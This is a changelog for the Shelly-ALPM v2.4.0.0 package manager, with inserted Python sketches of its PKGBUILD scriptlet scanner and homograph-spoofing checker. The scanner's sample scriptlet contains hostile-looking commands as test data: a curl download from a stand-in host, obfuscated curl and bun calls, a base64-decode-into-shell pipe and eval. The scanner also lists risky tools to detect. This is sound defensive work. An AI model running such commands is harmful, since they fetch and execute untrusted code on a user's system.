
Shelly Changelog

Version v2.4.0.0

Shelly-ALPM v2.4.0.0 Release Notes

This release centers on a major CLI refactor, maturing AppImage/Flatpak support, and a new layer of PKGBUILD security analysis.

On the safety side, Shelly now actively inspects install scriptlets for dynamic code execution and post_install risks — the new PostInstallValidator scans resolved scriptlets for risky network/code-fetching tools (npm, npx, bun, pip, curl, wget, etc.) and flags dynamic command construction that can’t be statically reviewed, including command substitution ($(...), backticks), eval, ${!var} indirection, and decode-into-shell pipelines (e.g. base64 -d | sh). It even performs lightweight de-obfuscation (collapsing tricks like b''u''n, cur\l, and n"p"m) so deliberately hidden tool names are caught and escalated to Critical as a sign of malicious intent.

Complementing this, the new HomographValidator defends against homograph/IDN spoofing in attacker-controlled fields (package names, dependencies, URLs, and AUR metadata) by detecting zero-width/bidi/control characters, mixed-script tokens (e.g. Latin mixed with Cyrillic/Greek), fullwidth/compatibility forms, and confusable “skeletons” that map look-alike Unicode onto ASCII (e.g. Cyrillic а → a). Findings surface through the same PkgbuildReviewDialog security-status path so users can review them before installing.
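The scriptlet checks described above can be sketched as follows. This is an added example, not Shelly's PostInstallValidator code: the function names, the "Warning" level and the sample scriptlet are assumptions, and only the tool list, the flagged constructs and the Critical escalation come from the release notes.

```python
import re

# Tool names and constructs are the ones listed in the release notes; the
# "Warning" level and every identifier here are assumptions of this example.
RISKY_TOOLS = {"npm", "npx", "bun", "pip", "curl", "wget"}
DYNAMIC = [
    ("command substitution", re.compile(r"\$\(|`")),
    ("eval", re.compile(r"\beval\b")),
    ("${!var} indirection", re.compile(r"\$\{!\w+")),
    ("decode-into-shell pipeline",
     re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")),
]
STRIP_QUOTING = str.maketrans("", "", "'\"\\")

def deobfuscate(word):
    """Drop the quotes and backslashes a shell would remove: b''u''n -> bun."""
    return word.translate(STRIP_QUOTING)

def scan_scriptlet(text):
    """Return sorted (line, severity, reason) findings for a scriptlet."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # whole-line comment
        for word in re.findall(r"[^\s;|&()`]+", line):
            plain = deobfuscate(word)
            tool = plain.rsplit("/", 1)[-1]  # /usr/bin/curl -> curl
            if tool in RISKY_TOOLS:
                hidden = plain != word  # name was disguised by quoting tricks
                findings.append((lineno, "Critical" if hidden else "Warning",
                                 ("obfuscated " if hidden else "") + f"tool: {tool}"))
        for reason, pattern in DYNAMIC:
            if pattern.search(line):
                findings.append((lineno, "Warning", reason))
    return sorted(findings)

# Constructed sample scriptlet, not taken from a real package.
SAMPLE = r"""post_install() {
    curl -fsSL https://example.invalid/setup.sh -o /tmp/setup.sh
    b''u''n install
    cur\l https://example.invalid/x
    echo "$payload" | base64 -d | sh
    eval "$cmd"
    target=${!name}
    ver=$(cat /etc/version)
}"""

if __name__ == "__main__":
    print(*scan_scriptlet(SAMPLE), sep="\n")
```

The word-level check is deliberately conservative: a quoted argument such as `echo "npm"` is reported as well, which suits a review dialog where a human makes the final call.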
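The homograph checks listed for HomographValidator, as an added sketch that is not Shelly's own code. The function names are assumptions, the confusables table is a tiny constructed subset (a full table would come from Unicode's confusables data, UTS #39), and scripts are approximated from Unicode character names because the Python standard library has no script property.

```python
import unicodedata

# Tiny constructed subset of look-alike mappings, for illustration only.
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y",   # Cyrillic
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",   # Greek
})
SCRIPTS = ("LATIN", "CYRILLIC", "GREEK")

def scripts_in(token):
    """Scripts of the letters in token, read from Unicode character names."""
    found = set()
    for ch in token:
        if ch.isalpha():
            words = unicodedata.name(ch, "").split()
            found.update(s for s in SCRIPTS if s in words)
    return found

def skeleton(text):
    """Fold compatibility forms, then map look-alikes onto ASCII."""
    return unicodedata.normalize("NFKC", text).translate(CONFUSABLES)

def check_field(value):
    """Return the homograph findings for one attacker-controlled field."""
    findings = []
    # Cf covers zero-width and bidi format characters, Cc covers controls.
    if any(unicodedata.category(ch) in ("Cf", "Cc") for ch in value):
        findings.append("invisible-or-control")
    if unicodedata.normalize("NFKC", value) != value:
        findings.append("compatibility-form")
    if len(scripts_in(value)) > 1:
        findings.append("mixed-script")
    folded = skeleton(value)
    if folded != value and folded.isascii():
        findings.append(f"confusable-with:{folded}")
    return findings

# Constructed sample values, written with escapes so the code points are visible.
SAMPLES = ["firefox", "firef\u043ex", "\u0440\u0430\u0441", "lib\u200bssl", "\uff43url"]

if __name__ == "__main__":
    for value in SAMPLES:
        print(ascii(value), check_field(value))
```

The all-Cyrillic sample shows why the skeleton check is needed in addition to mixed-script detection: a name written entirely in one non-Latin script is not mixed, yet it still folds to an ASCII look-alike.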

Rounding out the CLI work, this release ships a pacman-style shortcode interface: a compact -<Type><Action><modifiers> syntax that translates familiar single-letter operations into Shelly’s full command surface, making the CLI feel native to anyone coming from pacman/yay.

🔑 Shortcode Examples

The first argument may be a shortcode of the form -<Type><Action>[modifiers], where the Type selects a domain (S = system/repo, A = AUR, F = Flatpak, I = AppImage, C = config, K = keyring, U = utility) and the Action/modifiers map to a verb and flags:

shelly -SIu firefox # install firefox -u (sync install, with upgrade)
shelly -SQad # query -a -d (query available, fetch details of exact match)
shelly -SRcr pkg # remove pkg -c -r (cascade + config removal); the equivalent of `sudo pacman -Rns pkg`
shelly -AS ripgrep # aur search ripgrep
shelly -AI yay-bin # aur install yay-bin
shelly -FR org.app.Id # flatpak uninstall org.app.Id
shelly -KV ABCD1234 # keyring recv ABCD1234
shelly -UC # cache-clean

Invalid combinations are rejected with helpful errors (e.g. an unknown action lists valid actions for that type, and an unknown modifier lists the allowed modifiers), and in shortcode mode --ui-mode is used in place of -U.

✨ Highlights

  • New CLI Release with a substantial refactor and modernized command surface (#1059, #1103).
  • AppImage support maturing: updates now shown in the UI, eventing improvements, and fixes to desktop-entry handling (#1053, #1058, #1075, #1087, #1092).
  • Security additions: PKGBUILD review now shows security status, flags dynamic/post_install code execution, and detects potential homograph spoofing (#1099, #1100).
  • doas support added as an alternative privilege-elevation backend (#1078).

🚀 Features

  • Add doas support (#1078)
  • Add manual language selection in settings (#1056) — thanks @nyx1d
  • Add docs command, with printed command options and default cascade enabled (#1084, #1097)
  • Add Zsh completions for the Shelly CLI (#1090)
  • Show AppImage updates in the UI (#1058)
  • Add new version column to AUR update view (#1047)
  • Add maintainer and last-updated columns to AUR search output (#1071)
  • Add security status to PkgbuildReviewDialog (#1099)
  • Add HomographValidator to flag homograph spoofing in PKGBUILDs (#1100)

🛠 Improvements & Refactors

  • CLI refactor (#1059) and new CLI release (#1103)
  • Refactor CredentialManager and add ProcessExecutor service (#1066)
  • Convert PerformDownload to async and refactor call sites (#1079)
  • Skip provider selection when only one distinct option is available (#1070)
  • Replace --elevated flag in UpgradeAll with a UserIdentity-based approach (#1093, #1094)
  • Refactor question handling to remove obsolete ALPM-specific protocols (#1091)
  • Update file-size display to Megabytes and refactor progress-bar logic (#1082)
  • Simplify query (#1076) and remove the explore alias from query (#1085)
  • AppImage eventing and CLI output updates from the manager (#1087, #1092)
  • Flatpak output and UI element updates (#1049, #1080)
  • General small UI adjustments (#1046)
  • Remove unused config options and delete unused/unwanted code (#1081, #1086)

🐞 Bug Fixes

  • Fix AppImages creating an additional desktop entry (#1053)
  • Fix Flatpak upgrade bug and remote selection (#1054)
  • Fix Flatpak scrolling issue (#1061)
  • Various AppImage fixes (#1075)

🌐 Localization

  • Update de-DE.po (#1089) — thanks @Henry2o1o

📦 Maintenance / Versioning

  • Merge Dev into master and master back-merge (#1040, #1041)
  • Update UI elements in Flatpak (#1049)
  • Bump version to 2.3.3.5 across all projects and PKGBUILD files (#1101)
  • Bump version to 2.4.0.0 across all projects and PKGBUILD files (#1102)

Contributors to Shelly-ALPM v2.4.0.0

  • @caroberrie — #1040, #1041, #1046, #1049, #1053, #1054, #1058, #1061, #1075, #1080, #1081, #1086, #1087, #1092
  • @ZoeyErinBauer — #1059, #1070, #1071, #1076, #1078, #1079, #1082, #1090, #1091, #1093, #1094, #1100, #1101, #1102, #1103
  • @azdanov — #1066, #1084, #1085, #1097, #1099
  • @Terrabade — #1047
  • @nyx1d — #1056 (first contribution 🎉)
  • @Henry2o1o — #1089

👋 New Contributors

  • @nyx1d made their first contribution in #1056

Full Changelog: https://github.com/Seafoam-Labs/Shelly-ALPM/compare/v2.3.3.4...v2.4.0.0

© 2026 Seafoam Labs